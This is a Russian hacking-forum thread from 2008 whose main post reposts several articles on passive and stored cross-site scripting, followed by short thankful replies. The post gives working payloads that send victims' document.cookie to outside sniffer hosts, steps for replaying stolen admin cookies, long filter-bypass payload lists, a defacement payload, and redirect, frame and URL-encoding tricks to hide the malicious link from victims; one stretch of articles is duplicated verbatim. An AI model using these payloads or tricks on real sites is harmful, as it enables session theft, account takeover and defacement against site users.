Пассивные и Активные XSS - теория и практика
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Пассивные и Активные XSS - теория и практика - 2008-11-27 04:39:10.180000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Статья не моя, просто на мой взгляд написано очень доступно, в ней собрано всё основное то, чтобы понять: 1. Что такое XSS вообще 2. Для чего нужен XSS 3. Пассивные и Активные XSS - определение и примеры поиска Если вы в курсе - не читайте, только для новичков, хотя есть интересные моменты и для "опытных" пользователей. Итак, XSS - это http://ru.wikipedia.org/wiki/Межсайтовый_скриптинг =====Статья #1 XSS - взглядом хакера.Как хакеры используют XSS======== Cookies -что такое? Служат для сохранения учётных данных сайта на компьютере юзера. Если вы зарегестрировались на сайте под именем "Вася Попов" то сайт сохранил у вас на компьютере файл с cookies где закодированы ваши данные. А теперь представим, что вы Вася Попов администратор сайта. У вас есть доступ к изменению информации на сайте и прочей байде. Я "Антон Котов" перехватываю cookies Васи Попова. И и захожу на сайт…сайт меня определяет как Васю Попова и у меня администраторские права. Таким вот не хитрым способом можем перехватывать права. Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку. (прим. - т.е. это и есть сама суть XSS) Перехват кукисов. Скачайте программу A4 Proxy установите её. в меню options установите галочку direct connection во вкладке proxy options установите browser port 8080 check port 80 Далее зайдите в Internet Explorer-сервис-свойства обозревателя-подключения (выберите подключение и отметье)-настройка-поставьте галочку Использовать прокси-сервер… выставьте адрес 127.0.0.1 и порт 8080 всё К примеру вы нашли XSS на каком нибудь сайте, вставляете скрипт <sсriрt>img = new Image(); img.src = "http://www1.hut.ru/anek.shtml?"+document.cookie;</sсriрt> переменная document.cookie это и есть cookies. В данном случае cookies будут отправленны на сниифер http://www1.hut.ru/anek.shtml вы сможете зайти на http://www1.hut.ru/aneksniff/sniffer.txt и увидеть перехваченные cookies ** Дадим ссылку админу на скрипт.Подождём пока админ не посмотрит на ссылку и куки не уйдут на http://www1.hut.ru/aneksniff/sniffer.txt , периодически просматриваем лог…ищем куки админа. далее остаёться только подменить свои кукис на перехваченные, на сайте-жертве. Заходим в A4 Proxy во вкладку Browser options в поле Variable пишем Cookie в поле Replace with… копируем из лога сниффера http://www1.hut.ru/aneksniff/sniffer.txt содержимое переменной query и нажимаем кнопочку add.(прим. - тоже самое можно сделать в ОПЕРА - Инструменты - Дополнительно - Управление cookies - название сайта - изменить) Всё заходим на сайт как админ. ======Статья #2.Авторские заметки о XSS========== Исходя из того, что в интернете к сожалению по прежнему безопастность дело не первоочередное мы практически в каждома сайте можем найти уязвимость. Мы находим уязвимость и соощаем её администратору сайта, что здесь у вас такая-то дыра, и что неплохо было бы если в новостях сайта мелькнёт имя Next Level Security Team. Итак перейду конкретно к тому как найти в данном сайте XSS. Напишу об этом основываясь на своём опыте. Перед нами www.site.ru что нам надо искать? 1) КОнечно же ищем куда загрузить картинку-XSS, если есть фильтр смотрим используеться ли расширенние *.png. Если используеться пробуем загрузить псевдо-картинку-XSS. 2) открываем каждый модуль (файл) сайта. и смотрим всевозможные поля для метода Post. (отправки на сервер) 3)ищем скрытые поля типа hidden и всякие различные элементы значение которых передаваёться на сервер на сервер (всякие галочки, низспадающие менюшки и т.д.) Преобразовать все эти лементы в поля поможет программка IE_XSS_Kit.rar или какой нить её аналог. 4) выписываем название файла в блокнотик, далее в html коде ищем строки "action" и "name" и выписываем значение. Т.е. куда отправляеться и что отправляеться. И так в каждом модуле просматриваем возможные переменные. Дальше пробуем для кого нить малопосещаемого (по нашему мнению) модуля различные переменные. Выше я написал мои методы проверки на уязвимость, а теперь конкретно, что делать с переменными, какое значение писать и как обходить фильтр А) Ужасна распастраннёная узявимость типа "> т.е. в каждой переменной пишем "><sсriрt>alert()</sсriрt> и проверяем после отправки, открываем html и ищем слово alert т.е. ищем ответ сайта и что с запросом сделал фильтр. Если вы обнаруживаете, что-то типа alert() или ">alert() или <sсriрt />alert()</sсriрt> т.е. фильтр разришает отправлять и выполнять кавычки, он только преобразует запрос => то тогда вы нашли XSS. Остаёться только правильно составить запрос, чтобы он выполнился. Б) Используем фильтр для запроса. Это применяеться тогда когда к вашему запросу добавляет фильтр какую нить инфу которая портит запрос. к примеру вы отправили <sсriрt>alert()</sсriрt> а не чего не выполнилось. Вы лезете в html и видите <sсriрt>alert()</sсriрt>> свой целый запрос + фильтр добавил "> Ту легко, естественно нам следует послать <sсriрt>alert()</sсriрt Фильтр дополнит наш запрос и он выполниться. (пример такой XSS недавно найденная на форуме в хакер.ру) Бывает такое загружаете запрос а фильтр дополняется тэги </sсriрt> какую нить фигню.Т.е. вы загружаете <sсriрt>alert()</sсriрt> открываете html ищите alert и видите такую картину: <sсriрt></sсriрt></textarea>alert()</sсriрt> В некоторых случаях этот фильтр тоже не трудно обойти, пишем <sсriрt></sсriрt></textarea><sсriрt>alert()</sсriрt> (аналогич. XSS можно узреть в форумах на Ruhelp.com) В) Используя скрытые переменные и переменные объектов всяких менюшек и т.п. пытаемся выполнить запрос. т.е. сначало программой IE_XSS_Kit.rar Открываем все такие объекты как простые поля и пытаемся в писать в них составить запрос. г) основная ошибка разработчиков движков. Состоит в объявлении строковой переменной вместо числовой. т.е. к примеру такой путь www.site.ru/?page_id=2 Конечно мы подуммаем что переменная page_id - числовая. Но я сколько раз натыкался на такие нелепые ошибки, что переменную назначали строковой и она держала символы. Отправим www.site/index.php?action&page_id=2k Если не будет ошибки а будет надпись "страница не найденна" 99% что переменная строковая и мы можем попробовать вставить запрос. тщательно просматривайте все такого рода переменные. д)Поиск активных XSS. Очень трудная и кропотливая работа. Просто так вы уже в XSS на запись любой запрос не выполните. Тут надо использовать другие разрешённые тэги и прекрываясь ими надо выполнить запрос. тэги URL,BB,IMG могут помочь нам в этом. Весь смысл вставки заключаеться в том, что нам надо встроить запрос в парметр img или url У Img есть много парметров кроме src и alt. ======Статья #3.Авторские заметки о XSS - продолжение========== Рассмотрим что такое XSS это выполнение произволного скрипта на сайте. Скрипт будьто яваскрипт или вбскрипт или html-тэг это сценраий который используеться для формирования и отображения информации в браузере. т.е. XSS атаки это атаки не на сам сайт а на пользователей сайта. т.к. скрипты для сервера - пустое место. Пассивная XSS - это когда вам удалось просто выполнить скрипт на сайте не сохраняя его. Активная XSS - это когда вам удалось сохранить где нибудь в страничке скрипт и при каждом обновлении странички скрипт выполняеться. К примеру вставка скрипта в дневники, в доски объявлений в форум, в гостевые книги и т.д. Рассмотри применение пассивных XSS, открываем любой сайт и пытаемся найти пассивную XSS т.е. нефильтруемое или плохофильтруемое место где можно вставить свой скрипт. Обычно для распознания выполнения скрипта используют скрипт вывода сообщения <sсriрt>alert()</sсriрt> т.е. если вышло сообщение (табличка) то вы нашли XSS. Открываем любой ресурс и в полях для ввода текста пытаемся вставить <sсriрt>alert()</sсriрt> Пытаемся вставить во се различные поля этот скрипт…если вышло сообщение значит скрипт обработался и выполнился. Самая распостранёная XSS (наблюдаеться во всех местах где плохая фильтрация): "><sсriрt>alert()</sсriрt> Вся суть в "> Давайте подуммаем что мы делаем когда вводим в поле "><sсriрt>alert()</sсriрt>, что происходит? мы вводим в форму "><sсriрt>alert()</sсriрt> какая-то перменной присваиваеться значение поля перменная обрабатываеться и "> выполняеться и закрывает скрипт и выпролняя <sсriрt>alert()</sсriрt> ……… Эта XSS самая распостранёная. т.е. просматриваем все поля сайта и пытаемся вставить "><sсriрt>alert()</sсriрt> если вышло сообщение вы нашли XSS…далее вы можете составить запрос передачи куков на сниффер и дать эту ссылку человеку зарегестрированном на этом сайте, к примеру админу…он заходит на неё и его кукисы уходят на сниффер. Нам остаёться подменить свои кукисыф на адлминские и мы админы сайта=) ещё если фильтруеться sсriрt XSS: <sсriрt 1>alert()</sсriрt 1> вот такой вот вред кроеться в пассивной XSS - воровство кукисов. Надеюсь всё поняли до этого момента. ПОиск всех XSS А как определить крутой фильтр стоит или нет?* да очень просто в любое поле вводим: сука<>,"\ Дальше открываем html страничку и ищем слово "сука" и смотри последующие сиволы.. = Если <> так и остались то это раз, это значит что фильтр имеет дырку. если ,"'\ символы остались такие как введёные - это два, как возможные дополнительные символы к последующей XSS атаке. = Если открыв HTML вы не обнаружили <> то скорее всего дырка в фильтре. = Если открыв HTML вы обнаружили что <> заменены на другие символы то это обломс - фильтр покрайней мере функционирет нормально. Возможно ещё ввести в поле для проверки фильтрации вот так: "><>'", т.е. с нашей "> =))) …. Многие длуммают что нахождение XSS в ресрусах это тупой подбор уже готовых скриптиков, — заявляю открыто это ерунда, конечно вам может повести и вы не попадёте на более менее серьёзную фильтрацию и ваша XSS выполниться но это большая редкость… Итак как мы поняли щупаем фильтр методом проб и проверок: 1) вводим в поле символы 2) смотри в html профильтрованый ответ что у нас получаеться к примеру мы ввели в форум: в различные поля е-майл сайт текст сообщения "><> вышла ошибка неправильный е-майл, неправильный сайт тогда в емайл вводим: suka@yandex.ru"><> в сайт вводим соотвественно: http://www.com.net"><> ну и в сообщение <> Дело в том что на разные поля разная фильтрация, конечно серьёзные разработчики ставят одинаково крутую фильтрацию на все поля, но таких оч. мало Итак лезим в html ищем нашу мессагу и смотрим профильтрацию. к примеру <> остались как есть тогда добавляем ещё сообщение в форуме "><sсriрt>alert()</sсriрt> смотрим что получилось…возможно фильтр ищет такие слова как sсriрt, javascrip,vbsсriрt и фильтрует их…тогда существует возможность ввести так: "><sсriрt 1>alert()</sсriрt 1> Рассмотрим случай если фильтр съедает <> в этом случае существует вероятность дырки. к примеру фильтра условия съедать <sсriрt>,<> и т.д. тогда пробуем <qweqweqwfdfsdv213> и смотри если не съелось нашли дырку…дпльше можно составить скрипт XSS Ещё существует метод вложенного скрипта, к примеру вот так: <sc<sсriрt>ript>alert()</sc</sсriрt>ript> это если фильтр не оч. сильный и плохо фильтрует. Ещё можно попробовать во так: >>>><<sсriрt бывает что фильтр подсчитывает откр и загр. скобки и закрывает сам. т.е. сначало фильтрует а потом закрывает…что даёт нам дырку к инъекции скрипта. частенько бывает что фильтр дополняет скрипт, к примеру вот этим "> (т.е. закрывает скрипт) К примеру XSS на xakep.ru http://forum.xakep.ru/error.asp?sessionID="><IMG%20SRC="javasсriрt:alert(); фильтр смотрит что нечего опсасного в <IMG%20SRC="javasсriрt:alert(); нет и закрывает тем самым выполняя скрипт. ….. Ещё конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код. ……. Короче ребята всё надо пытаться методом проб и ошибок искать. Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра. методом тыков понять как фильтр работает, есть ли у него недоработки. если фильтр плохой мы всегда можем вставить скрипты. ….. Теперь рассмотрим активные XSS с помощью разрешённых тэгов. К примеру просмтреть ресурс, к примеру форум на наличие использования тэгов , к примеру вставляем ф форум: выходит крестик…значит img используеться и мы его подобрали (просто дело в том, что бывает img включён а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании разной формы) если крестика нет…а весит всего надпись то попробуйте ещё так: проверим держит ли фильтр пробел, добавляем пробел после расширения jpg если крестик есть тогда ура. (далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт) пытаемся к примеру вставить: проверяем отсылаем, кокроче как появиться сообщение значит нашли активную XSS и вместо alert() можете вставить любой скрипт. Если фильтр не сдался попробуйте так: и короче всё надо тестить…абсолютно всё И XSS кстати сейчас пассивные наблюдаються в 90% ресурсов. а активные в 60% так что у вас всегда 1\2 что найдёте активную XSS главное протестите фильтр и попытайтесь выполнить скрипт. вот выпишу XSS которые я частенько юзаю: (естественно их надо преобразовывать под конкретную цель) [font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background: url(javasсriрt:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]] [font color=red[img src=http://wj.gifwj/style=background:;url(javasсriрt: document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]] <IMG SRC="javasсriрt:alert('XSS');"> <IMG SRC=javasсriрt:alert('XSS')> <IMG SRC=JaVasсriрt:alert('XSS')> <IMG SRC="livesсriрt:">
<IMG SRC="mocha:[code]">
<IMG SRC='vbsсriрt:msgbox("XSS")'>
<imgjavasсriрt:alert()>
<IMG LOWSRC="javasсriрt:alert('XSS')">
<IMG DYNSRC="javasсriрt:alert('XSS')">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<IMG SRC=" javasсriрt:alert('XSS');">
<IMG SRC="jav
asсriрt:alert('XSS');">
<IMG SRC="jav
asсriрt:alert('XSS');">
<IMG SRC="jav asсriрt:alert('XSS');">
<IMG SRC="jav asсriрt:alert('XSS');">
<IMG SRC=`javasсriрt:alert("RSnake says, 'XSS'")`>
<IMG SRC=javasсriрt:alert("XSS")>
<XSS STYLE="xss:еxprеssion(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
<A HREF="javasсriрt:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
a="get";b="URL(\"";c="javasсriрt:";d="alert('XSS');\")";eval(a+b+c+d);
<sсriрt SRC=http://ha.ckers.org/xss.js?<B>
<BR SIZE="&{alert('XSS')}">
Кстати если кавычки фильтруються...есть оч. хорошая кодировка ASCII charcode
<IMG SRC=javasсriрt:alert(String.fromCharCode(88,83,83))>
ещё напишу что существует реальный псевдо-дефейс страницы в которую сохраняете активную XSS
это достигаеться инъекцией на чтение нового объекта
Делаем дефейс, кодируем его в HTML (without semicolons) кодировку
и заменяем &# запятыми.
вставляем в XSS document.write(String.fromCharCode(КОД))
где вместо код ваш закодированный дефейс.
сохраняем сообщение и вместо текущей страницы появиться ваш дефейс.
т.е. получаеться активная XSS может предпологать реальную атаку с псевдо-заменой (содержания) страничек.
пример:
<IMG SRC=javasсriрt:document.write(String.fromCharCode(60,104,116,109,108,62,1087,1088,1080,1084,1077,1088,
32,1088,1077,1072,1083,1100,1085,1086,1081,32,1072,1090,1072,1082,1080,32,1072,1082,1090,1080,1074,1085,1086,
1081,32,88,83,83,60,47,104,116,109,108,62))>
======Статья 5.Примеры поиска активных XSS==========
Тут постараюсь поведать о самих примерах XSS.
Просто видео сделать и нормально отправить интернет не позволяет, т.е. скорость передачи данных-(((
...
ВОт -с тут я напишу вначале вообщем о XSS, потом буду писать примеры:
1) это мы вводим, 2) - ответ фильтра 3) комменты
XSS:
1) html-кодировку используем для обхода фильтра, только если уже имеем
вставгу тэга.
к примеру так вот нельзя:
[полностью закодирован скрипт]
[<sсriрt[закодирован закр. тэг] [код инъекции]
[<sсriрt[закодирован закр. тэг] [код инъекции] [код закрыв. sсriрt]
Правильно кодировать только середину между тэгами, сами тэги должны <...> быть полностью нормальные-обычные.
К примеру правильно будет так:
<sсriрt>[код]</sсriрt>
<img [код]>
и т.д.
[код] не обяз. всё закодировано, надо пробовать различные комбинации.
2) Надо помнить что коды у символов с разны регистром (т.е. маленькая буковка - большая) разные
а восприятие одинаковое.
Поэтому надо пробовать комбинировать маленькие символы с большими и т.д.
Ну сразу пытаюсь протестить фильтр на символы <,>,",:,(,),/
отправляю эти сиволы с каким нить словом чтобы искать ответ легче было.
AIRSG>,<,",:,(,),/
AIRSG,>,<,:,(,),/
т.е. ковычки фильтруються (съедаються)
<sсriрt>alert()</sсriрt>
sсriрtalert()/sсriрt
Скорее всего фильтрация идёт по извесным словам sсriрt, img и т.д. отправим левое слово и посмотрим ответ:
<qweqweq>
<qweqweq>
О так и думмал, теперь попоробуем:
<sсriрt 1>alert()</sсriрt 1>
sсriрt%201alert()/sсriрt%201
Ну тогда пощупаем регистр:
<sсriрt>alert()</sсriрt>
sсriрtalert()/sсriрt
нуль эммоций, тогда, пробуем комбинировать или тестить др. букву на регистр:
<sсriрt>alert()</sсriрt>
<sсriрt>alert()</sсriрt>
вышел алерт
УРа!!!
Второй пример (2)
",>'<
",<,",>
[img]http://qwe/1.jpg[/img]
[img src=http://qwe/1.jpg " alt="" /> http://qwe/1.jpg Картинка [img src=http://qwe/1.jpg"> и попытаться вставить в них скрипт или комбинировать их. к примеру вставляем ф форум: выходит крестик…значит img используеться и мы его подобрали (просто дело в том, что бывает img включён а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании разной формы) если крестика нет…а весит всего надпись то попробуйте ещё так: проверим держит ли фильтр пробел, добавляем пробел после расширения jpg если крестик есть тогда ура. (далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт) пытаемся к примеру вставить: проверяем отсылаем, кокроче как появиться сообщение значит нашли активную XSS и вместо alert() можете вставить любой скрипт. Если фильтр не сдался попробуйте так: и короче всё надо тестить…абсолютно всё И XSS кстати сейчас пассивные наблюдаються в 90% ресурсов. а активные в 60% так что у вас всегда 1\2 что найдёте активную XSS главное протестите фильтр и попытайтесь выполнить скрипт. вот выпишу XSS которые я частенько юзаю: (естественно их надо преобразовывать под конкретную цель) [font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background: url(javasсriрt:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]] [font color=red[img src=http://wj.gifwj/style=background:;url(javasсriрt: document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]] <IMG SRC="javasсriрt:alert('XSS');"> <IMG SRC=javasсriрt:alert('XSS')> <IMG SRC=JaVasсriрt:alert('XSS')> <IMG SRC="livesсriрt:">
<IMG SRC="mocha:[code]">
<IMG SRC='vbsсriрt:msgbox("XSS")'>
<imgjavasсriрt:alert()>
<IMG LOWSRC="javasсriрt:alert('XSS')">
<IMG DYNSRC="javasсriрt:alert('XSS')">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<IMG SRC=" javasсriрt:alert('XSS');">
<IMG SRC="jav
asсriрt:alert('XSS');">
<IMG SRC="jav
asсriрt:alert('XSS');">
<IMG SRC="jav asсriрt:alert('XSS');">
<IMG SRC="jav asсriрt:alert('XSS');">
<IMG SRC=`javasсriрt:alert("RSnake says, 'XSS'")`>
<IMG SRC=javasсriрt:alert("XSS")>
<XSS STYLE="xss:еxprеssion(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
<A HREF="javasсriрt:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
a="get";b="URL(\"";c="javasсriрt:";d="alert('XSS');\")";eval(a+b+c+d);
<sсriрt SRC=http://ha.ckers.org/xss.js?<B>
<BR SIZE="&{alert('XSS')}">
Кстати если кавычки фильтруються...есть оч. хорошая кодировка ASCII charcode
<IMG SRC=javasсriрt:alert(String.fromCharCode(88,83,83))>
ещё напишу что существует реальный псевдо-дефейс страницы в которую сохраняете активную XSS
это достигаеться инъекцией на чтение нового объекта
Делаем дефейс, кодируем его в HTML (without semicolons) кодировку
и заменяем &# запятыми.
вставляем в XSS document.write(String.fromCharCode(КОД))
где вместо код ваш закодированный дефейс.
сохраняем сообщение и вместо текущей страницы появиться ваш дефейс.
т.е. получаеться активная XSS может предпологать реальную атаку с псевдо-заменой (содержания) страничек.
пример:
<IMG SRC=javasсriрt:document.write(String.fromCharCode(60,104,116,109,108,62,1087,1088,1080,1084,1077,1088,
32,1088,1077,1072,1083,1100,1085,1086,1081,32,1072,1090,1072,1082,1080,32,1072,1082,1090,1080,1074,1085,1086,
1081,32,88,83,83,60,47,104,116,109,108,62))>
======Статья 5.Примеры поиска активных XSS==========
Тут постараюсь поведать о самих примерах XSS.
Просто видео сделать и нормально отправить интернет не позволяет, т.е. скорость передачи данных-(((
...
ВОт -с тут я напишу вначале вообщем о XSS, потом буду писать примеры:
1) это мы вводим, 2) - ответ фильтра 3) комменты
XSS:
1) html-кодировку используем для обхода фильтра, только если уже имеем
вставгу тэга.
к примеру так вот нельзя:
[полностью закодирован скрипт]
[<sсriрt[закодирован закр. тэг] [код инъекции]
[<sсriрt[закодирован закр. тэг] [код инъекции] [код закрыв. sсriрt]
Правильно кодировать только середину между тэгами, сами тэги должны <...> быть полностью нормальные-обычные.
К примеру правильно будет так:
<sсriрt>[код]</sсriрt>
<img [код]>
и т.д.
[код] не обяз. всё закодировано, надо пробовать различные комбинации.
2) Надо помнить что коды у символов с разны регистром (т.е. маленькая буковка - большая) разные
а восприятие одинаковое.
Поэтому надо пробовать комбинировать маленькие символы с большими и т.д.
Ну сразу пытаюсь протестить фильтр на символы <,>,",:,(,),/
отправляю эти сиволы с каким нить словом чтобы искать ответ легче было.
AIRSG>,<,",:,(,),/
AIRSG,>,<,:,(,),/
т.е. ковычки фильтруються (съедаються)
<sсriрt>alert()</sсriрt>
sсriрtalert()/sсriрt
Скорее всего фильтрация идёт по извесным словам sсriрt, img и т.д. отправим левое слово и посмотрим ответ:
<qweqweq>
<qweqweq>
О так и думмал, теперь попоробуем:
<sсriрt 1>alert()</sсriрt 1>
sсriрt%201alert()/sсriрt%201
Ну тогда пощупаем регистр:
<sсriрt>alert()</sсriрt>
sсriрtalert()/sсriрt
нуль эммоций, тогда, пробуем комбинировать или тестить др. букву на регистр:
<sсriрt>alert()</sсriрt>
<sсriрt>alert()</sсriрt>
вышел алерт
УРа!!!
Второй пример (2)
",>'<
",<,",>
[img]http://qwe/1.jpg[/img]
[img src=http://qwe/1.jpg " alt="" /> http://qwe/1.jpg Картинка [img src=http://qwe/1.jpg" alt="" /> http://qwe/1.jpg <img src=http://qwe.ru/">lowsrc=javasсriрt:alert()/1.jpg()> Ура XSS выполнилась!!!! ======Статья 6.Примеры Использования пассивных XSS========== Поговорим о том как использовать пассивные XSS: допустим вы нашли XSS, давать в чистом виде XSS опасно, так как только полный ломак не догадаеться что это запрос напередачу куков. т.е. нам надо как-то скрыть запрос. ============ 1) XSS-картинка перенаправление ============ предлагаю следующее: вставить редиректом запрос на картинку с сайта, чтобы ты давал не картинку юзеру посмотреть, а левый сайт. создать к примеру 2-а файла: main.html с любым содержанием сайта, к примеру: <html> Сайт находиться в стадии разработки… </html> и файл index.html с содержанием: <html> <sсriрt language="Javasсriрt"> document.location.href = "http://site.ru/kartinka.jpg"; </sсriрt> </HTML> где http://site.ru/kartinka.jpg твой путь к XSS-картинке создать картинку с содержанием: <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> document.location.href = "http://pilot-86.narod.ru/main.html"; </sсriрt> где http://pilot-86.narod.ru ссылка на твой сайт теперь тебе остаёться закачать файлы main.html и index.html на сайт и предлогать юзверям посмотреть твой сайт (в данном случае http://pilot-86.narod.ru/) теперь сама суть: юзверь заходит на сайт, срабатывает скрипт переадресации (в index.html) переадресация на картинку. Картинка же отдаёт куки снифферу и переадресовываеться на файл на твоём сайте main.html У юзверя в url происходит кидалово по ресурсам…довольно быстрое, мало кто просечёт тему. Теперь вы спросите а зачем в картинке писать много раз скрипт передачу куков, отвечу просто, т.к. нужно время передачи куков на сниффер, т.е. во время выполнения первого скрипта передачи куков, выполняютсья остальные (как тайм аут) а потом переадресация. Если сделать один скрипт передачи куков на сниф в картинке, то не всегда куки будут успевать передаваться. ============= 2) XSS запрос простое кодирование ============= К примеру вы нашли XSS: http://site.ru/?search="><sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> предлагаю метод переадрессации…метод простой и для ломачков. создаём файл Index.html с содержанием запроса. Но тут надо немножко поработать…т.е. надо закодировать в урл-кодировке сам запрос. Вы спросите зачем это надо…поясняю, вот как бы выглядел простой запрос в чистом виде: <sсriрt language="Javasсriрt"> document.location.href = "http://site.ru/?search="><sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt>;" </sсriрt> НУ?* догадались в чём проблема?* посмотрите на ковычки. в данном случае у нас будет переадресация не на полный запрос а на http://site.ru/?search= Нам надо закодировать или ковычки или лучше всего, полностью весь запрос после = я закодирвал это "><sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> в это %68%74%74%70%3A%2F%2F%73%69%74%65%2E%72%75%2F%3F%73%65%61%72%63%68%3D%22%3E%3C%73%63%72%69%70%74%3E%69% 6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A% 2F%2F%67%6C%79%75%6B%2E%62%79%75%2E%72%75%2F%73%6E%69%66%2F%73%6E%69%66%2E%70%68%70%3F%22%2B%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E теперь вернёмся к составлению index.html, записываем в него: <sсriрt language="Javasсriрt"> document.location.href = "http://site.ru/?search=%68%74%74%70%3A%2F%2F%73%69%74%65%2E%72%75%2F%3F%73%65% 61%72%63%68%3D%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69% 6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%67%6C%79%75%6B%2E%62%79%75%2E%72%75%2F%73%6E%69%66%2F% 73%6E%69%66%2E%70%68%70%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E" </sсriрt> всё кидаем Index.html на сайт и даём ссылку сайта юзеверям поглядеть=) ===================== Метод скрытия переадресации путём скрытого фрэйма. ===================== Создаём 3-и файла: Index.html с содержанием: <html> <frameset cols="90%,10%"> <frame src="1.html" name="window1" frameborder="no" scrolling="no"> <frame src="2.html" name="window2" frameborder="no" scrolling="no"> </frameset> </HTML> файл 1.html содержанием: <html> моя страница </html> и файл 2.html: с переадресацией на XSS В своё время я ставил врэймов 5-6 с переадресациями на разные почтовые сервера…что давало возможность с помощью одного сайта перехватить почту с разных серверов. * примечание…метод с фрэймами хоть и самый крутой, но у него есть момент торможения,в файл с содержанием страницы необходимо вставить какую нить тяжёленькую картинку, чтобы было время загрузки и куки успели перехватиться. ( хороший кодировщик-дэкодировщик можно обнаружить тут: http://ha.ckers.org/xss.html ) =================================================== Рабочий снифер php Based Sniffer [phpBS] v2.3 © Kanick 2005 - просто установите на свой сервер с поддержкой php Скачать или сниффер от уважаемого FRILL: http://forum.xakep.ru/m_1546613/tm.htm Кому все таки трудно понять, как настроить и юзать свой личный снифер на своем серваке - юзайте паблик web-снифер от KolPeeX http://forum.xakep.ru/m_1383557/tm.htm
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 09:26:52.370000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Закрепляю. PS: Форум из-за соображений безопасности каверкает слова: script, onload, onerror и т.д. Не ленитесь, переписывайете нужный вам код ручками.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 10:16:12.646666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Pashkela Это как раз то, чего здесь не хватало. Молодец! +2
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 15:26:05.986666
|
|
|
mactep.Black
Сообщений: 6065
Оценки: 678
Присоединился: 2008-02-28 13:01:19.656666
|
о, это именно то что мне нужно.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 19:37:13.656666
|
|
|
Cheloveg
Сообщений: 102
Оценки: 0
Присоединился: 2008-07-14 12:07:39.023333
|
Наконец-то кто-то написал более подробно как использовать ксс"ку… спс, щас буду тестировать!
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 21:26:48.276666
|
|
|
BeeLet89
Сообщений: 117
Оценки: 0
Присоединился: 2008-10-19 10:40:01.816666
|
Спс, чувак… . Можеш… :):):) +2
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 23:37:13.436666
|
|
|
AnDronY3K
Сообщений: 238
Оценки: 0
Присоединился: 2008-10-27 12:18:03.826666
|
quote:
о, это именно то что мне нужно. И я того же мнения…..
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-01 10:03:16.650000
|
|
|
Дом0сеД
Сообщений: 4
Оценки: 0
Присоединился: 2008-12-01 02:59:31.310000
|
quote:
ORIGINAL: Cheloveg Наконец-то кто-то написал более подробно как использовать ксс"ку… спс, щас буду тестировать! Подробнее некуда. Круто!! пасиб!
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-03 21:11:13.920000
|
|
|
Haru6atoR
Сообщений: 18
Оценки: 0
Присоединился: 2008-10-18 16:33:02.380000
|
